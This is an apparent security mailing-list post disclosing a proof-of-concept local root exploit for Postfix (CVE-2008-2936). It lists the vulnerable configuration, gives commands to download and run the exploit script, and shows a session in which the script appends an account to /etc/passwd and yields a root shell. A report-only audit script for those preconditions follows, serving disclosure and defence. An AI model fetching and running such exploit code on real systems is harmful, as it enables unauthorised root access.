PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)

Hello,

The recent vulnerability in Postfix discovered by Sebastian Krahmer is
trivially exploitable when certain preconditions are met. Nevertheless,
it's very difficult to find such conditions in a real-world scenario. I
wrote this exploit for fun and to demonstrate that. I also hope it helps
sysadmins to check and test their systems.

I used an Ubuntu/Debian (IA32) system which *I had to make vulnerable on
purpose*. The tweaks were:
- #1: make the spool writable by the attacker
  chmod o+w /var/mail
- #2: disable mail aliases (LDA should be able to deliver mail directly to
  the "root" mailbox)
- #3: use the "local" postfix process as LDA

Perhaps condition #1 is the most difficult to meet for a normal
(non-privileged) user. But think about a privilege escalation if you manage
to get into the "mail" group first (the spool dir is typically writable by
members of the "mail" group).

For #2, it depends on configuration, but Ubuntu/Debian usually creates an
alias for "root", so that mail is delivered to a non-root account (which
makes the system non-vulnerable to this exploit).

When installing Postfix, you are asked to choose a local delivery agent
(LDA). I found one of my test systems using procmail (not vulnerable) and
another one using postfix built-in LDA (vulnerable).

For a quick test, normally, it will be sufficient to append the following
lines to /etc/postfix/main.cf (both values left blank intentionally):
alias_maps =
mailbox_command =

Finally, postfix should be refreshed:
postfix reload

There are other preconditions like:
- #4: postfix should not be using maildir-style mailboxes
- #5: mailbox for "root" should not exist (or at least you should have
  permission to delete it, which is not always possible, even when #1 is true)

My script tries to do its best to check for these conditions (postfix
config is very flexible, I only checked some typical parameters). Feel free
to write me for corrections, etc.

=============
roman@jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh 
roman@jupiter:~$ chmod a+x rs_pocfix.sh
roman@jupiter:~$ ./rs_pocfix.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt  
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[*] Spool dir is writable
[*] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107")
[*] Sending mail (3 seconds wait)
[*] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass
is "dsrrocks")
roman@jupiter:~$ su dsr
Password:
sh-3.1#

=============
PS: I didn't find Wietse's nice advisory [1] on the postfix.org site (or at
least, if it exists, it's not easy to find). Although it seems that some
non-POSIX issues in the OS are contributing to the vulnerability, IMHO it's a
(low-medium risk) vulnerability in Postfix and it deserves to be listed on the
Postfix page. Despite this issue, Postfix continues to be one of the best
pieces of mail server software ever made and my favourite MTA.

[1] http://article.gmane.org/gmane.mail.postfix.announce/110 

--

Cheers,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
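An added audit script, not the rs_pocfix.sh attached to the mail and not Roman's code, that reports whether a host matches preconditions #1 to #5 listed above without modifying anything (the sysadmin check the mail hopes for). Beyond what the mail names, it assumes Postfix's postconf -h interface, the mail_spool_directory and home_mailbox parameters (real Postfix settings; a home_mailbox value ending in "/" selects maildir delivery), and POSIX ls, ln and mktemp:

```shell
#!/bin/sh
# pocfix_audit.sh: report-only check for the CVE-2008-2936 preconditions the
# mail lists (#1 to #5). Added example, not the rs_pocfix.sh attached to the
# mail; it reads values with postconf(1) and never modifies the system.
# Assumed beyond the mail: postconf -h, the parameter names mail_spool_directory
# and home_mailbox (real Postfix parameters), and ls -ld permission columns.

# Kernel-side precondition: does link(2) hard-link the symlink itself (the
# behaviour the PoC reports as "Hardlink to symlink not dereferenced")?
# Prints "yes" or "no"; uses a throwaway directory and removes it again.
hardlink_keeps_symlink() {
    hk_dir=$(mktemp -d "${TMPDIR:-/tmp}/pocfix_audit.XXXXXX") || return 2
    if ln -s /nonexistent "$hk_dir/sym" 2>/dev/null \
       && ln "$hk_dir/sym" "$hk_dir/hard" 2>/dev/null \
       && [ -L "$hk_dir/hard" ]; then
        hk_res=yes
    else
        hk_res=no
    fi
    rm -rf "$hk_dir"
    echo "$hk_res"
}

# Configuration and spool preconditions, evaluated from plain values so the
# logic can be exercised without a Postfix install.
#   $1 mailbox_command   $2 alias_maps   $3 home_mailbox   $4 mail_spool_directory
# Prints one line per condition. Returns 0 when every precondition holds (the
# host looks exposed) and 1 when at least one of them does not.
check_config() {
    cc_ok=0
    # #3: an empty mailbox_command means Postfix's own local(8) writes the mailbox
    if [ -z "$1" ]; then
        echo "[!] mailbox_command is empty: built-in local(8) delivery"
    else
        echo "[*] mailbox_command = $1: external LDA, not exposed"; cc_ok=1
    fi
    # #2: without alias maps, mail for "root" ends up in root's own mailbox
    if [ -z "$2" ]; then
        echo "[!] alias_maps is empty: mail for root goes to root's mailbox"
    else
        echo "[*] alias_maps = $2: root mail can be aliased elsewhere"; cc_ok=1
    fi
    # #4: a home_mailbox ending in "/" selects maildir delivery, which is not affected
    case "$3" in
        */) echo "[*] home_mailbox = $3: maildir-style delivery, not exposed"; cc_ok=1 ;;
        *)  echo "[!] mbox-style delivery into $4" ;;
    esac
    # #1: spool writable by everyone; a merely group-writable spool (the "mail"
    # group case from the mail) is reported but does not count as exposed
    cc_mode=$(ls -ld "$4" 2>/dev/null | cut -c1-10)
    case "$cc_mode" in
        ????????w?) echo "[!] spool $4 is world-writable" ;;
        ?????w????) echo "[*] spool $4 is only group-writable: group membership needed first"; cc_ok=1 ;;
        *)          echo "[*] spool $4 is not writable by unprivileged users"; cc_ok=1 ;;
    esac
    # #5: an existing root mailbox blocks delivery tricks unless it can be deleted
    if [ -e "$4/root" ]; then
        echo "[*] $4/root already exists"; cc_ok=1
    else
        echo "[!] no mailbox for root in $4"
    fi
    return $cc_ok
}

# Pull the live values through postconf(1) and run every check.
# Returns 0 when the host matches all preconditions, 1 when it does not, and 2
# when Postfix is not installed.
audit_live() {
    if ! command -v postconf >/dev/null 2>&1; then
        echo "[*] postconf not found: Postfix does not seem to be installed"
        return 2
    fi
    if [ "$(hardlink_keeps_symlink)" = yes ]; then
        echo "[!] link(2) hard-links the symlink itself (as the PoC requires)"
    else
        echo "[*] hard links to symlinks are dereferenced: not exposed"
        return 1
    fi
    check_config "$(postconf -h mailbox_command)" "$(postconf -h alias_maps)" \
                 "$(postconf -h home_mailbox)" "$(postconf -h mail_spool_directory)"
}

# Running the file directly audits the local host; the functions above can also
# be sourced and called with explicit values.
audit_live
```

Lines marked [!] are preconditions that hold; the host only matters if every one of them holds together with the kernel-side check, which is why check_config returns 0 in that case alone. Fixing any single [!] line (for example restoring the root alias or using procmail as LDA) removes the exposure.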
